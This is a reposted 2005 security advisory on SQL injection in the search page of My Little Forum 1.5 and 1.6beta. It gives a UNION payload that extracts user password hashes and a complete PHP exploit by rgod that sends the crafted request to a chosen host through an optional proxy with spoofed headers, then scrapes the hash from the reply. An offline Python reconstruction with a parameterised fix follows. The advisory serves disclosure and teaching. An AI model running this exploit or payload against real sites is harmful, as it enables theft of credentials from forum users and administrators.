Monday, September 26, 2005

[UNIX] My Little Forum SQL Injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

My Little Forum SQL Injection
------------------------------------------------------------------------

SUMMARY

<http://www.mylittlehomepage.net/my_little_forum> my little forum - "A
simple web-forum that supports classical thread view (message tree) as
well as message board view to display the messages."

My Little Forum is vulnerable to SQL injection through the search page.

DETAILS

Vulnerable Systems:
* my little forum versions 1.5 and 1.6beta

Vulnerable Code:
From line 144 of search.php:
..
$result = mysql_query("SELECT id, pid, tid,
    DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
    DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR,'".$lang['time_format']."') AS Datum,
    subject, name, email, hp, place, text, category
    FROM ".$forum_table."
    WHERE ".$search_string."
    ORDER BY tid DESC, time ASC
    LIMIT ".$ul.", ".$settings['search_results_per_page'], $connid);
..

Now go to the search page, select "phrase", and type:
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM
forum_userdata where user_name='[username]' /*

If magic quotes are off you get the password hash of any admin/user,
because $search_string is built from the unfiltered search parameter. The
payload needs a literal single quote to break out of the LIKE string, which
is why magic_quotes_gpc = on stops it. The twelve user_pw columns match the
twelve columns of the original SELECT, as a UNION requires, and the trailing
/* comments out the rest of the query (ORDER BY ... LIMIT ...).

Exploit:
<?php
# mlfexpl.php
#
# My Little Forum 1.5 (possibly prior versions) SQL Injection /
# MD5 password hash disclosure poc exploit with proxy support
#
# by rgod
# site: http://rgod.altervista.org
#
# make these changes in php.ini if you have troubles to launch this script
# (no longer required: the form fields are read from $_POST below):
# allow_call_time_pass_reference = on
# register_globals = on
#
# usage: launch this script from Apache, fill requested fields, then...
# dump all password hashes from database right now...
#
# Sun-Tzu: "You can be sure of succeeding in your attacks if you only attack
# places which are undefended. You can ensure the safety of your defense if
# you only hold positions that cannot be attacked."

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

// Read the form fields explicitly instead of relying on register_globals.
$host     = isset($_POST['host'])     ? $_POST['host']     : '';
$path     = isset($_POST['path'])     ? $_POST['path']     : '';
$port     = isset($_POST['port'])     ? $_POST['port']     : '';
$proxy    = isset($_POST['proxy'])    ? $_POST['proxy']    : '';
$username = isset($_POST['username']) ? $_POST['username'] : '';

echo '<head><title>My Little Forum 1.5 SQL Injection</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"><!--
body,td,th { color: #00FF00;} body { background-color: #000000;}
.Stile5 { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px;}
.Stile6 { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-style: italic; }
--></style></head>
<body>
<p class="Stile6">My Little Forum 1.5 SQL Injection</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<table width="84%"><tr><td width="43%">
<form name="form1" method="post" action="'.htmlspecialchars($_SERVER['PHP_SELF']).'">
<p><input type="text" name="host"> <span class="Stile5">hostname (ex: www.sitename.com)</span></p>
<p><input type="text" name="path"> <span class="Stile5">path (ex: /mylf/ or just /)</span></p>
<p><input type="text" name="port"> <span class="Stile5">specify a port other than 80 (default value)</span></p>
<p><input type="text" name="proxy"> <span class="Stile5">send exploit through an HTTP proxy (ip:port)</span></p>
<p><input type="text" name="username"> <span class="Stile5">username whom you want MD5 hash</span></p>
<p><input type="submit" name="Submit" value="go!"></p>
</form></td></tr></table></body>';

// Hex dump of the raw request: 16 bytes per row, followed by the ASCII view.
function show($headeri)
{
    $ii=0; $ji=0; $ki=0; $ci=0;
    echo '<table border="0"><tr>';
    while ($ii <= strlen($headeri)-1)
    {
        $datai=dechex(ord($headeri[$ii]));
        if ($ji==16) {
            $ji=0;
            $ci++;
            echo "<td>&nbsp;</td>";
            for ($li=0; $li<=15; $li++)
            { echo "<td>".htmlentities($headeri[$li+$ki])."</td>"; }
            $ki=$ki+16;
            echo "</tr><tr>";
        }
        if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else {echo "<td>".$datai."</td>";}
        $ii++;
        $ji++;
    }
    for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
    { echo "<td>&nbsp;&nbsp;</td>"; }
    for ($li=$ci*16; $li<strlen($headeri); $li++)
    { echo "<td>".htmlentities($headeri[$li])."</td>"; }
    echo "</tr></table>";
}

$proxy_regex = '/\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}\b/';

// Send the raw HTTP request, directly or through an HTTP proxy; the
// response ends up in the global $html.
function sendpacket($packet,$show)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='')
    {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) { echo 'No response from '.htmlentities($host).':'.(int)$port.'...'; die; }
    }
    else
    {
        if (!preg_match($proxy_regex,$proxy))
        { echo htmlentities($proxy).' -> not a valid proxy...'; die; }
        $parts=explode(':',$proxy);
        echo 'Connecting to '.htmlentities($parts[0]).':'.(int)$parts[1].' proxy...<br>';
        $ock=fsockopen($parts[0],(int)$parts[1]);
        if (!$ock) { echo 'No response from proxy...'; die; }
    }
    fputs($ock,$packet);
    $html='';
    if ($proxy=='')
    {
        while (!feof($ock)) { $html.=fgets($ock); }
    }
    else
    {
        // Read byte by byte until the proxy closes the connection and the
        // response headers have been seen.
        while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false))
        { $html.=fread($ock,1); }
    }
    fclose($ock);
    if ($show) {echo nl2br(htmlentities($html));}
}

if (($path<>'') and ($host<>'') and ($username<>''))
{
    if ($port=='') {$port=80;}

    // The 1.5 SELECT in search.php has 12 columns, so the UNION needs 12.
    $sql="%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw";
    $sql.=", user_pw"; //if version is 1.6 beta (11 columns), just comment out this line
    $sql.=" FROM forum_userdata WHERE user_name='".$username."'/*";
    $sql=urlencode($sql);

    if ($proxy=='')
    {$packet="GET ".$path."search.php?search=".$sql."&ao=phrase HTTP/1.1\r\n";}
    else
    {$packet="GET http://".$host.$path."search.php?search=".$sql."&ao=phrase HTTP/1.1\r\n";}
    $packet.="Client-IP: 127.0.0.1\r\n";
    $packet.="X-Forwarded-For: 127.0.0.1\r\n";
    $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
    $packet.="Referer: http://".$host.$path."search.php\r\n";
    $packet.="Accept-Language: en\r\n";
    $packet.="Accept-Encoding: gzip, deflate\r\n";
    $packet.="User-Agent: Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Keep-Alive\r\n\r\n";
    show($packet);
    sendpacket($packet,0);
    // The injected user_pw lands in the "category" column, which the results
    // page prints as ;<span class="category">(...)</span>
    $temp=explode(';<span class="category">(',$html);
    $temp2=explode(')</span>',isset($temp[1]) ? $temp[1] : '');
    $hash=$temp2[0];

    echo '<br>username: '.htmlentities($username).' hash: '.htmlentities($hash);
    # debugging...
    //echo htmlentities($html);
}
else
{
    echo '<br>fill in all requested fields, optionally specify a proxy...<br>';
}
?>

Version 1.6beta is vulnerable too:
..
$result = mysql_query("SELECT id, pid, tid,
    UNIX_TIMESTAMP(time + INTERVAL ".$time_difference." HOUR) AS Uhrzeit,
    subject, name, email, hp, place, text, category
    FROM ".$db_settings['forum_table']."
    WHERE ".$search_string."
    ORDER BY tid DESC, time ASC
    LIMIT ".$ul.", ".$settings['search_results_per_page'], $connid);
..

You get the same result by dropping one user_pw from the injection string,
because this SELECT has eleven columns (the Datum column is gone):

[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata
where user_name='[username]' /*
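
The following is an added example, not code from this advisory or from my little forum. It rebuilds the shape of the search.php query in Python against an in-memory SQLite database (the forum itself is PHP on MySQL) so that the 1.5 payload with twelve user_pw columns and the 1.6beta payload with eleven can both be run offline, shows that the column count has to match the original SELECT, and puts the parameterised form of the same query beside the vulnerable one. The LIKE-based $search_string for "phrase" mode, the table and column layout, the strftime stand-in for DATE_FORMAT and the sample rows are all assumptions made for the example.

```python
import sqlite3

# Constructed sample data (not from the advisory): one forum user with an
# illustrative MD5-style hash and two posts. SQLite stands in for MySQL so
# the query logic can be exercised offline.
SAMPLE_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"  # md5("password"), a placeholder


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE forum_entries (
            id INTEGER, pid INTEGER, tid INTEGER, time TEXT, subject TEXT,
            name TEXT, email TEXT, hp TEXT, place TEXT, text TEXT, category INTEGER);
        CREATE TABLE forum_userdata (user_name TEXT, user_pw TEXT);
        INSERT INTO forum_entries VALUES
            (1, 0, 1, '2005-09-26 10:00:00', 'hello', 'alice', '', '', '', 'first post', 0),
            (2, 1, 1, '2005-09-26 11:00:00', 're: hello', 'bob', '', '', '', 'a reply', 0);
    """)
    con.execute("INSERT INTO forum_userdata VALUES (?, ?)", ("admin", SAMPLE_HASH))
    return con


def vulnerable_search(con, search, version="1.5", ul=0, per_page=20):
    """Mirror of the search.php query: the phrase is spliced into the SQL text.

    The LIKE clause is an assumption about how $search_string is built for
    "phrase" mode; DATE_FORMAT is MySQL-only, so strftime stands in for it.
    """
    search_string = "text LIKE '%" + search + "%'"
    if version == "1.5":   # 12 result columns
        cols = ("id, pid, tid, strftime('%H:%M', time) AS Uhrzeit, "
                "strftime('%d.%m.%Y', time) AS Datum, subject, name, email, "
                "hp, place, text, category")
    else:                  # 1.6beta: Datum is gone, 11 result columns
        cols = ("id, pid, tid, strftime('%s', time) AS Uhrzeit, subject, name, "
                "email, hp, place, text, category")
    sql = ("SELECT " + cols + " FROM forum_entries WHERE " + search_string +
           " ORDER BY tid DESC, time ASC LIMIT " + str(ul) + ", " + str(per_page))
    return con.execute(sql).fetchall()


def union_payload(username, version="1.5"):
    """The advisory's payload: close the LIKE string, UNION in user_pw once per
    column of the original SELECT, and comment out the rest of the query."""
    ncols = 12 if version == "1.5" else 11
    return ("x%' UNION SELECT " + ", ".join(["user_pw"] * ncols) +
            " FROM forum_userdata WHERE user_name='" + username + "'/*")


def leaked_hash(con, username, version="1.5"):
    """Run the payload; the hash comes back in the last column ("category"),
    the field the exploit scrapes out of the results page."""
    rows = vulnerable_search(con, union_payload(username, version), version)
    return rows[0][-1] if rows else None


def column_mismatch_error(con):
    """An 11-column payload against the 12-column 1.5 query is rejected by the
    database, which is why the advisory gives one payload per version."""
    try:
        vulnerable_search(con, union_payload("admin", "1.6beta"), version="1.5")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def safe_search(con, search, ul=0, per_page=20):
    """Hardened form: the phrase travels as a bound parameter and its LIKE
    wildcards are escaped, so user input never reaches the SQL text."""
    escaped = (search.replace("\\", "\\\\")
                     .replace("%", "\\%")
                     .replace("_", "\\_"))
    sql = ("SELECT id, pid, tid, subject, name, email, hp, place, text, category "
           "FROM forum_entries WHERE text LIKE ? ESCAPE '\\' "
           "ORDER BY tid DESC, time ASC LIMIT ?, ?")
    return con.execute(sql, ("%" + escaped + "%", ul, per_page)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("1.5 leak:     ", leaked_hash(db, "admin"))
    print("1.6beta leak: ", leaked_hash(db, "admin", "1.6beta"))
    print("mismatch:     ", column_mismatch_error(db))
    print("parameterised:", safe_search(db, union_payload("admin")))
```

Running the script shows the hash coming back through both query shapes, the database refusing the wrong column count, and the parameterised query returning no rows for the same payload. Escaping % and _ in the bound pattern is a separate point from the injection: without it a search for "%" still matches every post, as vulnerable_search shows, even though no SQL is injected.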

ADDITIONAL INFORMATION

The information has been provided by <mailto:retrogod@aliceposta it> rgod.
The original article can be found at:
http://rgod.altervista.org/mylittle15_16b.html
